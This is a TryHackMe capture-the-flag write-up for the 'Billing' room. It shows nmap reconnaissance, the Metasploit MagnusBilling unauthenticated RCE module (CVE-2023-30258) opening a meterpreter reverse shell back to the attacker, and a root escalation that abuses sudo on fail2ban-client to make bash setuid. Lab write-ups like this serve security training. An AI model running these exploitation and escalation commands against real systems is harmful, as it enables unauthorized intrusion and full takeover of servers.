Billing
- 🌐 Website: TryHackMe
- 🔥 Level: Easy
- 🖥️ OS: Linux
- 🔗 Link: Billing
Foothold¶
Target: 10.10.153.225
Let's start with an nmap:
nmap --min-rate=10000 10.10.153.225 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-02 09:08 BST
Nmap scan report for ip-10-10-153-225.eu-west-1.compute.internal (10.10.153.225)
Host is up (0.00064s latency).
All 65535 scanned ports on ip-10-10-153-225.eu-west-1.compute.internal (10.10.153.225) are filtered
MAC Address: 02:C7:75:C5:29:71 (Unknown)
Seems not work. Let's try an SYN Scan:
root@ip-10-10-214-237:~# sudo nmap -sS 10.10.153.225
Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-02 09:09 BST
Nmap scan report for ip-10-10-153-225.eu-west-1.compute.internal (10.10.153.225)
Host is up (0.00010s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 02:C7:75:C5:29:71 (Unknown)
There are 3 ports and bruteforce is out of scope. Let's try an nmap with scripts
root@ip-10-10-214-237:~# sudo nmap -sC -sV -sS 10.10.153.225 -p22,80,3306
Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-02 09:11 BST
Nmap scan report for ip-10-10-153-225.eu-west-1.compute.internal (10.10.153.225)
Host is up (0.00016s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.62 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/mbilling/
|_http-server-header: Apache/2.4.62 (Debian)
| http-title: MagnusBilling
|_Requested resource was http://ip-10-10-153-225.eu-west-1.compute.internal/mbilling/
3306/tcp open mysql MariaDB (unauthorized)
MAC Address: 02:C7:75:C5:29:71 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
There is a robots.txt
on the website. Is where website is redirect to. Looking at the website I can see that is MagnusBilling
software. I searched online and I saw a module of metasploit for a Unauthenticated RCE. Let's try it.
User Access¶
msf6 > search magnus
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258 2023-06-26 excellent Yes MagnusBilling application unauthenticated Remote Command Execution.
1 \_ target: PHP . . . .
2 \_ target: Unix Command . . . .
3 \_ target: Linux Dropper . . . .
Let's use it!
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > run
[*] Started reverse TCP handler on 10.10.214.237:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 10.10.153.225:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 8 seconds.
[*] Elapsed time: 8.07 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (40004 bytes) to 10.10.153.225
[+] Deleted kbkUHRIhGAZGeHTh.php
[*] Meterpreter session 1 opened (10.10.214.237:4444 -> 10.10.153.225:57952) at 2025-07-02 09:24:30 +0100
meterpreter >
Answer
user.txt
is in fr /home/magnus
folder
Privilege Escalation¶
Let's check is asterisk
can run something as root
asterisk@ip-10-10-153-225:/home/magnus$ sudo -l
sudo -l
Matching Defaults entries for asterisk on ip-10-10-153-225:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Runas and Command-specific defaults for asterisk:
Defaults!/usr/bin/fail2ban-client !requiretty
User asterisk may run the following commands on ip-10-10-153-225:
(ALL) NOPASSWD: /usr/bin/fail2ban-client
asterisk@ip-10-10-153-225:/home/magnus$
Fail2Ban v1.0.2 reads log file that contains password failure report
and bans the corresponding IP addresses using firewall rules.
Let's try to add a cmd on fail2ban jail
asterisk@ip-10-10-153-225:/var/www/html/mbilling/lib/icepay$ sudo fail2ban-client status
t statusl2ban-client
Status
|- Number of jail: 8
`- Jail list: ast-cli-attck, ast-hgc-200, asterisk-iptables, asterisk-manager, ip-blacklist, mbilling_ddos, mbilling_login, sshd
asterisk@ip-10-10-153-225:/var/www/html/mbilling/lib/icepay$
sudo fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'chmod +s /bin/bash'"
sudo fail2ban-client set sshd banip 127.0.0.1
asterisk@ip-10-10-153-225:/var/www/html/mbilling/lib/icepay$ /bin/bash -p
/bin/bash -p
bash-5.2# whoami
whoami
root
bash-5.2#
Answer
Root's flag is in root's folder